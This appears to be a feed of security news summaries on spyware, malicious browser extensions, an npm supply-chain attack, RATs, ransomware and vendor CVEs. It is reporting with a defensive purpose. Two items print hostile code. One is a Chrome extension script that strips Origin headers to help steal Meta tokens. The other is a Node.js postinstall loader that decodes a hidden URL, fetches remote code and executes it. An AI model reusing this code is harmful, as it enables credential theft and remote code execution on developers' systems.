• The revelation that commercially available FlexiSPY spyware was clandestinely installed on devices belonging to Kenyan filmmakers while in police custody has ignited fresh concerns over press freedom and governmental overreach. Forensic analysis conducted by the Citizen Lab at the University of Toronto confirmed that two of the filmmakers’ phones were infected with the intrusive software […]

    The post Kenyan Filmmakers Targeted with FlexiSPY Spyware Tracking Messages and Social Media appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly discovered attack method targeting ArgoCD and Kubernetes that could give red-teamers fresh ammo and blue-teamers fresh headaches. This technique lets an attacker abuse Kubernetes DNS to steal powerful Git credentials from ArgoCD, potentially taking over entire Git accounts. Why Target ArgoCD and Kubernetes? In 2025, data exfiltration attacks are a major threat in […]

    The post Attackers Abuse Kubernetes DNS to Extract Git Credentials from ArgoCD appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A novel malicious Chrome extension has been uncovered targeting digital marketers by masquerading as a productivity tool for Meta ad campaigns.

    Dubbed “Madgicx Plus,” this extension is distributed through a network of deceptive websites posing as legitimate AI-driven advertising platforms.

    Rather than optimizing ad performance, the extension leverages powerful browser permissions to hijack user sessions and exfiltrate login tokens for Facebook and Instagram.

    The campaign’s operators have repurposed infrastructure from previous malicious extensions, demonstrating an evolving threat that adapts social engineering lures to current digital marketing trends.

    The extension’s distribution channels deploy professionally crafted domains—such as privacy-shield.world and madgicxads.world—that mimic real analytics and optimization services.

    Visitors are encouraged to install the extension under the pretense of boosting campaign ROI, only to grant it full host access and network request interception capabilities.

    Cybereason analysts noted that once installed, the extension injects content scripts into every visited page, enabling real-time harvesting of form inputs and session cookies.

    This level of access allows attackers to bypass content security policies and interact directly with Meta’s internal APIs.

    Impact assessments reveal that compromised credentials can lead to unauthorized modifications of advertising budgets, creation of new campaigns, and full takeover of business accounts.

    Small and medium enterprises, often lacking dedicated security teams, are at particularly high risk as they routinely delegate ad management to third-party tools.

    The ease with which the extension strips the HTTP Origin header from outbound requests further illustrates its capacity for seamless man-in-the-browser attacks.

    Victims may remain unaware until they observe unexplained billing charges or missing campaigns in their Meta Business Manager dashboards.

    Madgicx extension is linked by www[.]web-radar[.]world (Source – Cybereason)

    Under the guise of a legitimate tool, the extension’s manifest.json grants host_permissions for “” and leverages declarativeNetRequest rules to remove origin headers from any request matching the pattern “caller=ext.”

    This capability, combined with background scripts that forward stolen tokens to a command-and-control server, underpins a sophisticated data theft framework.

    The real IP addresses behind the Cloudflare proxies were identified through favicon hash analysis and Shodan queries, leading to infrastructure owned by VDSina—an ISP previously linked to hosting malicious resources.

    Infection Mechanism

    Upon installation, the extension’s manifest triggers automatic injection of a background script that monitors browser navigation events.

    The Web Radar extension, part of the same campaign, was linked by web-radar[.]world and has since been removed from the Chrome Store (Source – Cybereason)

    The snippet below illustrates how the extension intercepts form submissions to capture authentication tokens:-

    // manifest.json excerpt
    {
      "host_permissions": ["<all_urls>"],
      "permissions": ["declarativeNetRequest","declarativeNetRequestWithHostAccess"],
      "content_scripts": [
        {
          "matches": ["*://*/*"],
          "js": ["background.iife.js"]
        }
      ]
    }

    The core of the attack resides in background.iife.js, which establishes listeners for XHR requests to Facebook’s OAuth endpoints.

    When the user logs in, the script extracts the “access_token” from the JSON response and stores it in local storage before relaying it to the malicious C2 domain at madgicx-plus.com.

    By stripping the Origin header with a declarativeNetRequest rule, the extension evades same-origin checks and seamlessly integrates stolen tokens into attacker-controlled sessions:-

    // background.iife.js snippet
    chrome.webRequest.onBeforeSendHeaders.addListener(details => {
      details.requestHeaders = details.requestHeaders.filter(h => h.name !== 'Origin');
      return { requestHeaders: details.requestHeaders };
    }, {urls: ["*://*.facebook.com/*"]}, ["blocking","requestHeaders"]);

    Through these mechanisms, attackers gain persistent access to the victim’s Meta environment without triggering standard browser alerts.

    The extension’s combination of broad permissions, CSP bypass techniques, and covert token exfiltration marks a significant escalation in browser-based threats against social media advertises.

    Security teams should prioritize extension audits, restrict unnecessary permissions, and isolate advertising workflows to dedicated profiles to mitigate such risks.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Malicious Chrome Extension Attacking Users to Steal Meta Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A Chinese APT group compromised a Philippine military company using a new, fileless malware framework called EggStreme. This multi-stage toolset achieves persistent, low-profile espionage by injecting malicious code directly into memory and leveraging DLL sideloading to execute payloads. The core component, EggStremeAgent, is a full-featured backdoor that enables extensive system reconnaissance, lateral movement, and data […]

    The post EggStreme Malware Emerges With Fileless Techniques and DLL Sideloading Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • London North Eastern Railway (LNER) has confirmed that an unauthorized breach at one of its third-party suppliers exposed contact details and travel histories of some passengers. No banking or password data were involved. The company says it is treating the incident with the highest priority and is working with experts to secure customer information. What […]

    The post Cyber Attack Exposes LNER Train Passengers’ Personal Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly disclosed vulnerability in the Palo Alto Networks User-ID Credential Agent on Windows systems allows service account passwords to be exposed in cleartext under certain non-default configurations. Tracked as CVE-2025-4235, the flaw carries a CVSS base score of 4.2 (Medium) and has been assigned a Moderate urgency level. Palo Alto Networks released details and […]

    The post Palo Alto Networks User-ID Agent Flaw Leaks Passwords in Cleartext appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated npm supply chain attack that surfaced in late August targeted thousands of downstream projects by injecting malicious payloads into popular JavaScript libraries.

    Initial reports pointed to a new variant of the notorious Typosquatting technique, but further analysis revealed a more elaborate campaign that leveraged compromised maintainer credentials to publish backdoored modules under legitimate package names.

    The attack spread rapidly across the ecosystem, touching applications in enterprise SaaS platforms, developer tooling, and even educational projects.

    Wiz.io researchers noted unusual network activity originating from continuous integration (CI) pipelines shortly after innocuous library updates.

    While initial telemetry suggested data exfiltration, closer inspection showed the payloads executed only conditional routines, avoiding outright destructive behavior.

    Instead, the malicious code sampled environment variables, logged system metadata, and prepared to download secondary payloads from attacker-controlled domains.

    By design, the attackers minimized detectable anomalies, blending in with routine package updates and careful versioning strategies to maintain persistence.

    Impact assessments estimated that over 4,500 projects fetched at least one compromised release before maintainers rolled back affected versions.

    Despite this broad reach, analysis of blockchain-based payment channels and cryptocurrency wallets tied to the campaign showed that only a handful of transactions—totaling less than $200 in value—were ultimately completed.

    Impact of hacked popular npm packages (Source – Wiz.io)

    The low financial yield suggests that the operators were more interested in reconnaissance and establishing footholds rather than immediate monetization, underscoring the evolving motives behind modern supply chain threats.

    Wiz.io analysts later identified additional indicators of compromise (IoCs) embedded in popular CI logs, including obfuscated URLs and base64-encoded data blocks that served as the initial staging point for more complex malware families.

    This discovery prompted rapid patching of pipeline scripts and heightened scrutiny of npm registry credentials across major development teams.

    Infection Mechanism and Persistence

    The malicious packages employed a multi-stage infection mechanism that began with a benign-looking postinstall script.

    Upon installation, the script executes a small loader written in Node.js:-

    // figure1_loader.js
    const https = require('https');
    const { exec } = require('child_process');
    
    const payloadUrl = Buffer.from('aHR0cHM6Ly9lbWFpbC5hZGRyZXNzLmNvbS9sb2FkZXIuanM=', 'base64').toString();
    https.get(payloadUrl, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => {
        exec(data, (error, stdout, stderr) => {
          if (error) console.error(stderr);
          else console.log(stdout);
        });
      });
    });

    This demonstrates how the attacker concealed the real download URL using Base64 encoding to evade simple string-matching defenses.

    After retrieving the secondary payload, the loader writes a Node.js service file into the user’s home directory, ensuring automatic execution upon system reboot.

    This service introduces a persistence layer that survives package removals and registry clean-ups, effectively granting the attacker long-term access to compromised development environments.

    By chaining together innocuous-appearing scripts and encrypted staging, the campaign avoided common detection mechanisms and underscored the growing sophistication of supply chain threats.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Hackers Booked Very Little Profit with Widespread npm Supply Chain Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The threat actor delivers three Remote Access Trojans (RATs)—ValleyRAT, FatalRAT, and a newly discovered RAT dubbed kkRAT—via phishing sites hosted on GitHub Pages. These sites masquerade as legitimate software installers for popular applications. In each instance, a ZIP archive contains a malicious executable that initiates a multi-stage attack chain designed to evade analysis, disable endpoint […]

    The post kkRAT Exploits Network Protocols to Exfiltrate Clipboard Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat actors affiliated with the Akira ransomware group have continued to target SonicWall devices for initial access. Cybersecurity firm Rapid7 said it observed a spike in intrusions involving SonicWall appliances over the past month, particularly following reports about renewed Akira ransomware activity since late July 2025. SonicWall subsequently revealed the SSL VPN activity aimed at its

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • NVIDIA has released a security update for its NVDebug tool to address three high-severity vulnerabilities that could allow an attacker to escalate privileges, execute code, and tamper with data.

    The company is urging users to immediately install the latest version of the tool to protect their systems from potential exploitation.

    The security advisory details three distinct flaws, the most critical of which is CVE-2025-23342, with a CVSS base score of 8.2.

    This vulnerability, related to insufficiently protected credentials (CWE-522), could allow an attacker to gain access to a privileged account, leading to a complete system compromise.

    The second flaw, CVE-2025-23343, is a path traversal vulnerability (CWE-22) with a CVSS score of 7.6.

    A successful exploit could permit an attacker to write files to restricted parts of the file system, potentially leading to information disclosure, denial of service, or data tampering.

    The third vulnerability, CVE-2025-23344, is an OS command injection flaw (CWE-78) rated at 7.3. This issue could allow a non-privileged user to run arbitrary code on the host machine, providing a direct method for escalating privileges.

    The combination of these vulnerabilities poses a significant threat to affected systems. Privilege escalation is a primary concern, as it would allow an attacker with limited access to gain full administrative or root-level control.

    Once an attacker has elevated privileges, they can perform a wide range of malicious actions, including installing malware, exfiltrating sensitive data, or establishing a persistent foothold within the network.

    The potential for code execution further amplifies the risk, giving an attacker the ability to run any command or malicious payload on the compromised machine.

    NVIDIA has noted that its risk assessment is based on an average across diverse systems and recommends that users evaluate the risk specific to their own configuration and environment.

    Mitigations

    These vulnerabilities impact all versions of the NVIDIA NVDebug tool prior to version 1.7.0. The affected tool runs on systems with x86_64 or arm64-SBSA architectures.

    To remediate these security risks, NVIDIA has released a patched version of the software. The only recommended mitigation is to update the tool to version 1.7.0 or later.

    Administrators and developers who use the NVDebug tool should download and install the latest version from the official NVIDIA Developer Tools page as soon as possible.

    Promptly applying this update is essential to prevent attackers from leveraging these high-severity flaws to compromise systems.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post NVIDIA NVDebug Tool Vulnerability Let Attackers Escalate Privileges appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶